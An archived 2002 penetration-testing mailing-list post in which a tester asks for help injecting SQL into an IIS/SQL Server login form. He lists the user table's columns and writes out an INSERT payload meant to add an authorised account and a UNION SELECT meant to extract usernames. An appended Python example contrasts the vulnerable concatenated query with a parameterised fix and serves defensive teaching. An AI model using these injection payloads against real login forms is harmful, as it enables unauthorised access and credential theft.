Penetration Testing mailing list archives

sql table data enumeration help please.


From: "Gary O'leary-Steele" <GaryO () sec-1 com>
Date: Thu, 9 May 2002 20:47:43 +0100

Hi all,


I am currently performing a pen test against a web server using IIS with SQL
integration. There is a user name and password form which I want to bypass
and enumerate existing usernames and passwords.

I have discovered the following columns/table data:


tblusers.ID                 uniqueidentifier
tblusers.createdtimestamp   smalldatetime
tblusers.sessionID          nvarchar
tblUsers.LastUpdated        smalldatetime
tblUsers.LastUpdatedIP      nvarchar
tblUsers.LastUpdatedBy      uniqueidentifier
tblUsers.CompanyType        nvarchar
tblUsers.CompanyID          uniqueidentifier
tblUsers.Password           nvarchar
tblUsers.UserName           nvarchar
tblUsers.Title              nvarchar
tblUsers.Surname            nvarchar
tblUsers.Forename           nvarchar
tblUsers.AddressTo          nvarchar
tblUsers.Appointment        nvarchar
tblUsers.DirectPhone        nvarchar
tblUsers.Mobile             nvarchar
tblUsers.DirectEmail        nvarchar
tblUsers.DirectFax          nvarchar
tblUsers.Signature          The text, ntext, and image data types are invalid in this subquery or aggregate expression.
tblUsers.Address1           nvarchar
tblUsers.Address2           nvarchar
tblUsers.Address3           nvarchar
tblUsers.Address4           nvarchar
tblUsers.Address5           nvarchar
tblUsers.PostCode           nvarchar
tblUsers.HomePhone          nvarchar
tblUsers.UserAccess         bit

I want to update the table to bypass the auth screen.

I have tried:

-------------
www.target.comUserName='insert into
tblusers(createdtimestamp,sessionID,LastUpdated,LastUpdatedIP,LastUpdatedBy,
CompanyType,CompanyID,Password,username,title,surname,forename,AddressTo,App
ointment,DirectPhone,Mobile,DirectEmail,directfax,signature,address1,address
2,postcode,Homephone,UserAccess) values ('Oct 31 2000 8:52PM','7654','Oct 31
2000
8:52PM','127.0.0.1','','securitycompany','','test','test','mr','oleary','gar
y','addrto','appointment','01131234567','07796698919','garyo () sec-1 com',0113
1234567','sig','123','456','ls287sr','01132297541',1)--

------------

But had no joy.

In an attempt to gain access to data held with the username and password
fields, I have tried:

www.target.com/UserName='Union select 1,1,1,1,1,1,1,1,min(UserName) from
tblusers where username >'a'--&password=hacker

but get "Operand type clash: uniqueidentifier is incompatible with int"


Any help would be greatly appreciated.


----------------------------------------------------------------------------
This list is provided by the SecurityFocus Security Intelligence Alert (SIA)
Service. For more information on SecurityFocus' SIA service which
automatically alerts you to the latest security vulnerabilities please see:
https://alerts.securityfocus.com/
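
The two conditions the post relies on, a login query built by string concatenation and database error text returned to the client, are shown below beside a hardened form. This is an added example, not part of the original post or the tested application. Python's `sqlite3` stands in for the SQL Server back end, the table is a reduced subset of the columns listed in the post, and the function names are hypothetical.

```python
import sqlite3

# Input string quoted from the post above; everything else here is constructed.
POSTED_USERNAME = "'Union select 1,1,1,1,1,1,1,1,min(UserName) from tblusers where username >'a'--"
GENERIC = "invalid login"

def make_db():
    # Assumption: sqlite3 as a stand-in engine; columns are a subset of the post's list.
    # The plaintext Password column only mirrors the schema shown in the post.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE tblUsers (ID TEXT, UserName TEXT, Password TEXT, UserAccess INTEGER)")
    db.execute("INSERT INTO tblUsers VALUES ('id-1', 'alice', 'constructed-pw', 1)")
    return db

def login_concat(db, username, password):
    """'Before' form: input is spliced into the statement and driver errors reach the client."""
    sql = ("SELECT UserName FROM tblUsers WHERE UserName = '" + username +
           "' AND Password = '" + password + "'")
    try:
        row = db.execute(sql).fetchone()
    except sqlite3.Error as exc:
        return {"ok": False, "message": str(exc)}  # parser/schema detail disclosed
    return {"ok": row is not None, "message": "ok" if row else GENERIC}

def login_param(db, username, password, server_log):
    """Hardened form: bound parameters, one generic failure message, detail kept server-side."""
    sql = "SELECT UserName FROM tblUsers WHERE UserName = ? AND Password = ?"
    try:
        row = db.execute(sql, (username, password)).fetchone()
    except sqlite3.Error as exc:
        server_log.append(repr(exc))  # full error stays in the server log only
        return {"ok": False, "message": GENERIC}
    return {"ok": row is not None, "message": "ok" if row else GENERIC}

if __name__ == "__main__":
    db, log = make_db(), []
    print(login_concat(db, POSTED_USERNAME, "hacker"))      # engine error text leaks
    print(login_param(db, POSTED_USERNAME, "hacker", log))  # treated as a literal user name
    print(login_param(db, "alice", "constructed-pw", log))  # legitimate login still works
```

With bound parameters the posted string is compared as a literal user name, so the statement never changes shape and no engine error is produced for the client to read.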

